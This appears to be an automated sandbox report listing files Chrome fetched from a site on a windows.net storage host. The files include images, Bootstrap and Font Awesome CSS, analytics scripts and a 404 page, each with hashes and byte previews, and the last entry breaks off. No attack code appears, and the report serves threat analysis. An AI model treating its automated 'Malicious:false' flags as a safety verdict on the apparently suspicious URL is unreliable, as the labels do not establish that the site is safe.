                                                        Preview:.PNG........IHDR....................PLTE.......g......tRNS.@..f....pHYs................eIDATx^..n.0..)..:E}.......+e.p....c^IA.....Y..a.<Q.....l..(...r..^....p....3.[.uI.....w..U...#./,..*.a\ .*"."t*dmz.;ps.#u....0..Xb....R....~.....8u0..{\...eAl.z. ...>.B.4.M...e..A...`...t..(g).......@....`.g..b.Y./....,......D...~..<..M....8.Y.;|.../c..q...@_.qO..G.....Y@..&.be...../....yN....:x..8.....<W.........*.e......^^ .4..V..9.......v..>.....*.^7.~.._.O.o.@...o).....i...&........`..P.]...@.(....{.*......M......;...o..P...H.9yzv8..A.....}(#@..e...[.5.Nu.0..V.#6 I..8.4-.4-.{...G.R..I...%.)....+T...L..2..lK.6.....G.rlS.m.66..ls......a.a.;.6^....Q`...'v..d...kv...h.......}....N..g..lN....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1200 x 1260, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):35689
                                                        Entropy (8bit):7.658233342225225
                                                        Encrypted:false
                                                        SSDEEP:768:+dk7X7ai/932LWKhxepn/1eKWrJznfCfjlwXYyD0ixKuxMUH:+dsQSKhxOQKWrJznf6JnIxUuxDH
                                                        MD5:25FB1B036A658D3B2CA359031483B7B2
                                                        SHA1:DBD4896260D75CD28031479E1495B82DBBA0F726
                                                        SHA-256:426EEC34428CA37958C3697503680648F7D9658AE0FE6300E80DDC17797CEB85
                                                        SHA-512:BD1273B94DE729DFA0AFEAD57A5A62CC08862203DFADC3F1D2FFB63907FECB65CEF1F0961CA0B0B21ED87F27125EFB7F67C1603637890F1EDC9AF2634474DFCB
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/dm.png
                                                        Preview:.PNG........IHDR..............m{C....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...y..W]'..y.zM.b.Q.....a.#..e`.T.E3n.2H...CW.F).C.;...DE.\F.."..3,....*.$@.. {wW/U.....Y.rk..>..~." MU..]...=.I.............................................................................................................................`U.......>1I.~.H.&.....$.,.`.L.Y...........i.I...&.....6k.zc[...zcjnJSoJ[o..s9...xoj..K.....I.}....h....$.H..%..6.jj.J.rU..+._..e^...JS`....9.<!..>8iNI.)Mm.\KyPj....IN^.........=kv...Z...K.N..\QJ.o.+.ry.......:....0...`....)k.d.nk.lJi.\SNIrJ..Ro..55%..gV..u...,.W[...S..5.~2Z......LN_}.r..\..^.#k..y...'......X...>1u.DJ..i.).............Vm0.&.S2{..U.n.O..k..o.[m..#....I.....M.'..M.....L.J.......p...4.'R.7%....yXjNL.&.T.T,@=!.#k..,...u>...dzoI....M.'..KLl..hS`..w.....<"....%yx..$m.$UI..'$yTM.U.-...dr..I.xM.D.|".|"..|U^.0..X.0.^t..3WOk.Vk9-%.%...0..;).].'.h..LN.-.|.4.x..H..../....G.......~G...0..V....Gf
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (59765)
                                                        Category:dropped
                                                        Size (bytes):60044
                                                        Entropy (8bit):5.145139926823033
                                                        Encrypted:false
                                                        SSDEEP:768:wfAnnayQIk8HVheIE8Dg76TXQI4vPKMEK6viTlCDFm4n6xOp6Pxg3/wCVaAk2:wfUnTcWCw6xJxg7aAz
                                                        MD5:02D223393E00C273EFDCB1ADE8F4F8B1
                                                        SHA1:0CC93B8421D89C24A889642428B363CB831DE78A
                                                        SHA-256:79C599DD760CEC0C1621A1AF49D9A2A49DA5D45E1B37D4575BACE0A5E0226582
                                                        SHA-512:339296DF3B6E2080A65488634AA5DED35A15D9BA5EDB8F203B1AA695C62B13302FC2CECFC37CFA04AD2219BAF0BDDAD4414862DDE5E0B71A7923C3C3A3D61F8D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function s(){return(s=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&Objec
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:assembler source, ASCII text, with very long lines (339), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):22427
                                                        Entropy (8bit):4.8699349961913825
                                                        Encrypted:false
                                                        SSDEEP:192:G5pyua9kzmx5XO05bsXEruzG61fMDOe1tFp+ybFOoY5x0hIyqcr2V9qeDz7frYYP:apyusrrJTQSgGCVKw
                                                        MD5:1576797BDF8A59466F05C3998EDA76B4
                                                        SHA1:1C9C8C5CD74DF533CE8567E6C5ABD1263C16F952
                                                        SHA-256:907D1A25729E97DA1A8AC689BC122687B278DCD500CDFEA7EA7D052B4B4BAC62
                                                        SHA-512:98CBBE4A6EB8390688C2286F228C59EEBE2A10446E0F45695573AFD89070EFB0B31EE83D2C2C12B43867F02BD29D341F4C678A8DFBEA2CC365D719CBEF8F6580
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/css/tapa.css
                                                        Preview:.table,label {.. max-width: 100%..}.....btn:focus,.btn:hover,body {.. color: #333..}....#txtintro,.row:after {.. clear: both..}....#bottom ul,.mar_top ul,.total_detail ul,.total_detail_scan ul {.. list-style-type: none..}....#footer,#txts1,.btn,[role=button],button {.. cursor: pointer..}....@-webkit-keyframes progress-bar-stripes {.. 0% {.. background-position: 40px 0.. }.... to {.. background-position: 0 0.. }..}....@-o-keyframes progress-bar-stripes {.. 0% {.. background-position: 40px 0.. }.... to {.. background-position: 0 0.. }..}....@keyframes progress-bar-stripes {.. 0% {.. background-position: 40px 0.. }.... to {.. background-position: 0 0.. }..}....@keyframes rotate {.. 0% {.. transform: rotate(0).. }.... to {.. transform: rotate(360deg).. }..}....@keyframes zoominoutsinglefeatured {.. 0%,to {.. transform: scale(1,1).. }.... 50% {.. tran
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 13 x 13, 8-bit colormap, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):276
                                                        Entropy (8bit):5.44393413565082
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPfElUH+sbxFMAhClyVRpkv2g96+RWT8up:6v/7klbsbzTh2spkv2gR9c
                                                        MD5:7616D96C388301E391653647E1F5F057
                                                        SHA1:B1868C8F0F46309A8E26F584AC82000D54C06ECD
                                                        SHA-256:4C1606563842CCE5F1788329D4417AE3618B33C6365C56A7122439B6AB45C977
                                                        SHA-512:C7E5938D274D9D8B5218CF05F83B9B14CC89D1C9B4A7A18596354C548A84D499BC3818E242EDB2F1376A561DEC7DEBA134DD2ADAAC0283C145DA77CA43A8E517
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR.............E5.N...NPLTE...fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff=u......tRNS..zS...G...j.."...)..m.....(....[IDATx.e.I.. .C......E..n...i..T..}.....M.jDCB....,.e.<lg@.O...:K.P.5J..C.g.[...k...W.s...1.t..r....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1280x800, components 3
                                                        Category:downloaded
                                                        Size (bytes):39562
                                                        Entropy (8bit):7.40852798553151
                                                        Encrypted:false
                                                        SSDEEP:768:CqhQprnDtbhfB7G1DJrMs3/mo0s0AqkSxVk3jg5h52YW:ClbziPrM2/dV0Aek3jg5JW
                                                        MD5:52EB6A3E97C9440B2A403AF6B479D7E8
                                                        SHA1:638BCD1324F7AB8555440903FA47DDF5E583622A
                                                        SHA-256:CAD543CD7CC37691AF3D7FA4A7D26040E731E971B82801E3D7A071B714B7D0CD
                                                        SHA-512:AAE736B63E51B69A5B4CE89E954DDEA56AA52CCD62B00E73739C13B73CB318A872F3D76E8B0879546721BB54285C0C9F73982DC402543F3C35EE449B14CACB3C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/f24.jpg
                                                        Preview:......JFIF.....H.H......ICC_PROFILE............@..mntrRGB XYZ ............acsp.......................................-Qt..................................................rXYZ........gXYZ........bXYZ........wtpt...,....cprt...@....rTRC...L... gTRC...L... bTRC...L... desc...l..._XYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ .......O........text....N/A.para..........ff......Y.......[desc........sRGB..................................................................................C....................................................................C....................................................................... ...."..................................................................................P............................................................................................................................g+W..iP..........................................................J6....m..Iwo.hvs../.k.3lo>.K...U...D...@..Zq.......2..s........;.2T.n.\.E...t
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 140 x 30, 1-bit colormap, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):187
                                                        Entropy (8bit):6.13774750591943
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlDBTBwl5yTzcVrK42/uDlhl+fpq06IcNZd2yYgCKfLv3/tLGQctJmc:6v/lhPbTS+TABK7/6TCVkj2If/tLGmY5
                                                        MD5:271021CFA45940978184BE0489841FD3
                                                        SHA1:201030AF9B1BC5D3C8D453EFBFDF89B68D6C1BE5
                                                        SHA-256:C5A324F181AF16879B6C4C52B731B23392F2816DEF159B157C4DE620CFF1CD41
                                                        SHA-512:EFA6766F88B385F91EB0B3D0298AE16CA461055581E5AC898BC90931388898BA341FE780C0A4433DFA9A106FE408701944E89FF6F75DBA7D46AEE83D6173C50D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR..............d5....PLTEvvv.../.......pHYs................[IDAT(.....@...&....;......!8D....P@..&h./..5....e..%:.h)@.E'..st.......*..iq.5.A...w......piK.G....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1388), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):1388
                                                        Entropy (8bit):5.231846982902703
                                                        Encrypted:false
                                                        SSDEEP:24:cmuRRkN8vGrWh0eTg7PKNTBUQ4Wj0Uh9iQxZGd7MrWrKkIvIHI+0QS4bgy5wB9zD:KG8vGraVTEwTeWHHiQx0d7WWem1SLy5I
                                                        MD5:700410AC54C8CB733A8B0D20BB97B07E
                                                        SHA1:45ED5160B6F68783449455B9761C39FEEF492DF1
                                                        SHA-256:63438AC53941D537540DD5687AB8C1F1319509A2F6C419731D5E21CD3A850796
                                                        SHA-512:90A089D9B1269391396D89E7F56D4809A9FB5EB2B838F8E088DA180ECE01A5A2AEB0A05F2EF97E97CE93B9FE5DCBE5DA114FA2AFE8B4C5ED0F7EE60DAF363B5C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/js/script.compat.js
                                                        Preview:!function(){"use strict";var t,e=window.location,i=window.document,n=i.getElementById("plausible"),a=n.getAttribute("data-api")||(u=(t=(t=n).src.split("/"))[0])+"//"+(t=t[2])+"/api/event";function o(t,e){t&&console.warn("Ignoring Event: "+t),e&&e.callback&&e.callback()}function r(t,r){if(/^localhost$|^127(\.[0-9]+){0,2}\.[0-9]+$|^\[::1?\]$/.test(e.hostname)||"file:"===e.protocol)return o("localhost",r);if(window._phantom||window.__nightmare||window.navigator.webdriver||window.Cypress)return o(null,r);try{if("true"===window.localStorage.plausible_ignore)return o("localStorage flag",r)}catch(t){}var l={},s=(l.n=t,l.u=e.href,l.d=n.getAttribute("data-domain"),l.r=i.referrer||null,r&&r.meta&&(l.m=JSON.stringify(r.meta)),r&&r.props&&(l.p=r.props),new XMLHttpRequest);s.open("POST",a,!0),s.setRequestHeader("Content-Type","text/plain"),s.send(JSON.stringify(l)),s.onreadystatechange=function(){4===s.readyState&&r&&r.callback&&r.callback()}}var l=window.plausible&&window.plausible.q||[];window.pl
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 12 x 12, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):364
                                                        Entropy (8bit):7.161449027375991
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPkd5nDsLiRa6NhNj1aUIXtYRJiTDc7VkC0hWQpPBPFLsfd9EZXlo1p:6v/7yOLiRa6NzJJyusykCmpBFLoGi
                                                        MD5:E144C3378090087C8CE129A30CB6CB4E
                                                        SHA1:59DA5466551DE941D0215E45C54AA2CEAF436BE1
                                                        SHA-256:B13A03E0DB893734298CBE203BF264407636FFE5DAB0A141F83C492D0034DD6A
                                                        SHA-512:3004885B1DCC8C8544024F3C1345B80AB6B50759F290A3545BFA4ED7EA93426E838B7A04556294298BAD1C6198431FBDE06E999628E45DE10119DD1D4FABE32A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.\...E@.....TB...-n$...(....5T.7.x.=ZQ...l(n#....WL....N..rY..WY.%I..0.UU/N....|.,K...)...mEQ,.b].p.....8.u]..<....'...ih.....8`.8.........eY..^.o=..........4M..EQ?.B...a.v...q.e..A.^.W.E.4......e.}......+.0........+......m.TI|...3MS0.,{.wq.w.$.>|....0.u.{........IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1055 x 899, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):73052
                                                        Entropy (8bit):7.8433091874252225
                                                        Encrypted:false
                                                        SSDEEP:1536:ZA0n72I1IHRp0wwsG38rzZWFcvRMT/EYoiX4eA7:Z9Nop0wLGMrtWQRMLEYoiX0
                                                        MD5:28CCE20DB49BD94D0F575AAD0EE20D3C
                                                        SHA1:EDAFD2117F811AE322BD148AF05DBFA9F80137DE
                                                        SHA-256:6622BD287F52582FFA881E35FB0E7BDE40DC2D92694C0F5C04120D565F1CBB2F
                                                        SHA-512:82FD3F40E3F2FF4943B3BA30A55987393BF279C406CF1539B344F74A05C4265D8248D7B122A56B7056EAC33A703703CDADD186FBC819B53AC54522C5BBC927DB
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR..............;......pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 218407
                                                        Category:downloaded
                                                        Size (bytes):65516
                                                        Entropy (8bit):7.996155379862241
                                                        Encrypted:true
                                                        SSDEEP:1536:zXLRuzTwzCmJzBq6HWZHEAUNqjthIQ85j1MxKVpGL6mPIQKHG:zNuQemJI2oUNK8DMQLGL6mPIQKHG
                                                        MD5:CEB76217AAF3B7CA62D964B6AD16FAB3
                                                        SHA1:4791C2692D5D5B80BC3A0F0A25A1FD03F9DD8CAD
                                                        SHA-256:AC0BA71D34AFB80E87A80599EE8289258EEC91EC8B4B3B0A829C169EC4B0FF95
                                                        SHA-512:1468DE928760F88F1B0A4044F1D963EAD03DC58DD127705BE0EEAD8DFFE9D1E21F9BC186467504FACF359821A0AB0B2696317275D40C1482CF13C292B074B544
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://tools.luckyorange.com/core/core.js?v=49d958c
                                                        Preview:.............F. .*,....Y(..t..qeI.V...%..Y...d....T.Lr>...^.o.`...._...M.."..yA..Y%....q..@"......q.ge..Q....j.f.e.u.N.t....._...c..(gUn.+.;.m.d)..L.....LX..Y.'..Q..<.(...sR?......'...2K...^rw..o...Y..Yq.A...K.n7...n.t.e>...Zq.>..!v...8..2`.Ti.....P.a...p...S..<...c;......_...f.a."...........>...2.|.E3...U..,...L~.V..P..XH.Y.e...S......*m....3.dM0.E.s7.y._r.>K...o..4.S.|..*uSZ......+.Q..O....{..^x...|syXe"JO...g!.u...i.._.H.,J..........e...^..2...a..[.>.\fS......__.0{.n.K..(8.{.-.T.!|=.VJMY....v..n.RUH...0.A..c.......'.......q1...>........Q{1.....i./.6o......{.%S....G-..a....,..hG.+.......^...Y...g.6.6.Df..~..X..,...^..........,..q.AgpP... H..+~......d..^...E....".Lz..@|...Q..m.&.._...6b>....@...D......=......`...T.@..d..A...o....LR..S.. .Q.>...zW..[qza1. ..WA..O..R...yyaM.M.."Z.......p!c...^di.T..a.R.y.].."HB>. .."....K ?.t..i4.....#.E#.../.L,.....$.W..8.g8.N.,x...;....2>u-G...D.T.ra...u=.....h.^.X...$!.o.(..2.G..Z0.....Y...r._
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (27265)
                                                        Category:downloaded
                                                        Size (bytes):27428
                                                        Entropy (8bit):4.747313933055305
                                                        Encrypted:false
                                                        SSDEEP:384:ci5yWeTUKW+KlkJ5de2UYmydfwYUas8l8yQ/8c:3lr+Klk3YlKfwYUf8l8yQ/T
                                                        MD5:FD1609EB97E739683ACF23120FD6F6C9
                                                        SHA1:19B2E83FE8DF09B85E74835C398AEFEE816BDFCB
                                                        SHA-256:CE26D1B76DAE2F3B5D0CCC8D0ECD88D2EDB411101B8A4C5EDC4D9AA7008C9B04
                                                        SHA-512:2183FDCC8AEF88B15048E735EB2D588868AE4CAAD624B4C369F276402188CABA9C962065699798AA27BC4C18AE97E16BF8FCF219D762B73726AFB1A924BABCD2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/css/font-awesome.min.css
                                                        Preview:/*!. * Font Awesome 4.5.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot');src:url('../fonts/fontawesome-webfont_1.eot#iefix&v=4.5.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2') format('woff2'),url('../fonts/fontawesome-webfont.woff') format('woff'),url('../fonts/fontawesome-webfont.ttf') format('truetype'),url('../images/fontawesome-webfont.svg#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{pa
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65335)
                                                        Category:downloaded
                                                        Size (bytes):220780
                                                        Entropy (8bit):4.981998660189792
                                                        Encrypted:false
                                                        SSDEEP:1536:u1tfA98f66e7K5wlP72N9S3I17sYciHKVOpz600I4V9:ytfA98fXpKVOpz600I4V9
                                                        MD5:5B42276B3039EAF18CC199CB4C8DB7B8
                                                        SHA1:719956AA52DB4C8AFDC5C0CFB3CBDEAD6258B8A6
                                                        SHA-256:932EA15108928991BCF0C0A46415FC652DE5FFC0158C35205357B90C65EEB386
                                                        SHA-512:EF639578068F795F27DC17598FB84E91A3D2124FEEC290E4686C8FE16DA34B3002F2D7E23B82CC1035A82F7B85A7999C66EFBC11E85BE06859585C2FAECB3AF5
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/css/bootstrap.min.css
                                                        Preview:@charset "UTF-8";/*!. * Bootstrap v5.3.0-alpha1 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-r
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 13 x 13, 8-bit colormap, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):276
                                                        Entropy (8bit):5.44393413565082
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPfElUH+sbxFMAhClyVRpkv2g96+RWT8up:6v/7klbsbzTh2spkv2gR9c
                                                        MD5:7616D96C388301E391653647E1F5F057
                                                        SHA1:B1868C8F0F46309A8E26F584AC82000D54C06ECD
                                                        SHA-256:4C1606563842CCE5F1788329D4417AE3618B33C6365C56A7122439B6AB45C977
                                                        SHA-512:C7E5938D274D9D8B5218CF05F83B9B14CC89D1C9B4A7A18596354C548A84D499BC3818E242EDB2F1376A561DEC7DEBA134DD2ADAAC0283C145DA77CA43A8E517
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/bel.png
                                                        Preview:.PNG........IHDR.............E5.N...NPLTE...fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff=u......tRNS..zS...G...j.."...)..m.....(....[IDATx.e.I.. .C......E..n...i..T..}.....M.jDCB....,.e.<lg@.O...:K.P.5J..C.g.[...k...W.s...1.t..r....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 13 x 13, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):349
                                                        Entropy (8bit):7.047569859646336
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPfnY+7nDsphbAX6jNYCIh61Uw49/J3BYwmPYYSU+59AyROJwWgZPOIwCMR9:6v/74+U3AANXIsUDdI3+XtRZPONCMROO
                                                        MD5:7454C652E0733D92DE6C920C2D646AE0
                                                        SHA1:34A5BD8C7401F95E346895B0E5CCFFBF0E9AD638
                                                        SHA-256:44F752B0BD2E48052D538BC6ACA5379F3630CA64DA945F794690DDF47E8EAEF7
                                                        SHA-512:DDE6D40BEC105003CB93C52DD3322C26985FECC7FF1EAB79547FB7F0365AB2FB7B1CBA96AED81958C08627FC6C0BA6034BCEC53B1B66705D7B04202E7F8B5B59
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/ques.png
                                                        Preview:.PNG........IHDR...............s+....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.Q1.E@.e..jQ..3hTJ.J......$J..h)$B).t$._.&....).x....y.w...uu]7.......8..(.e.3MS.e.H.0.#."....Q...QU5.C.@.<...$.Bx..x.8.m.n..'r .}.....x.8..i.q.-........0..9O.A...............a.O..{.W..<......1V..0.O.....I..`.!L.....i....6.B#....~....p..Nq.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 834 x 40, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):4097
                                                        Entropy (8bit):7.848153220596051
                                                        Encrypted:false
                                                        SSDEEP:96:LXSDZ/I09Da01l+gmkyTt6Hk8nTSVmnLCrpCgWham:LXSDS0tKg9E05TSWLAiN
                                                        MD5:B57BBDBC31F12D43ED973B8A7E43EA3A
                                                        SHA1:E83CCAD4CD922E7E7C4D51CE1D4FD6D06EA0D02E
                                                        SHA-256:07394C92F7535B0D833FDC2413B5089C9777D4ED679FE13032851369FC0D5226
                                                        SHA-512:32AA3A2C0C558B95FD1CFF5B7E5BF0D866845560ECE8A05D7EEDFE7892934E7EAC6FC8731F228747828A189ECD8475B40CD6C51FBD19BA9A4B05D856C10CFB35
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ddbsodvnnadewe.z1.web.core.windows.net/images/pros.png
                                                        Preview:.PNG........IHDR...B...(.......J.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                        Category:dropped
                                                        Size (bytes):1607
                                                        Entropy (8bit):5.267420279695592
                                                        Encrypted:false
                                                        SSDEEP:24:hY6svD+6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z8xDU+KES8f:3qD+2+pUAew85zsDUB7A
                                                        MD5:E17D78DB8CE8452B703A5BE0C7DA8B5A
                                                        SHA1:C12C38C52F3EBDAE2C225D5C1F0F2B2C651E0616
                                                        SHA-256:C5391B8BF5A804753366B5937C3DFE72907C4650FBBE571B81C38859900D70DA
                                                        SHA-512:A70BE6F9A2C75EF0C3323B6816031D85CDABC54E0E273D0FC8EC2086194893F65C6FCFEBF3757225DC6C8B285021D39A704EFA6737071752B27AF2B97207DC55
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 140 x 30, 1-bit colormap, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):187
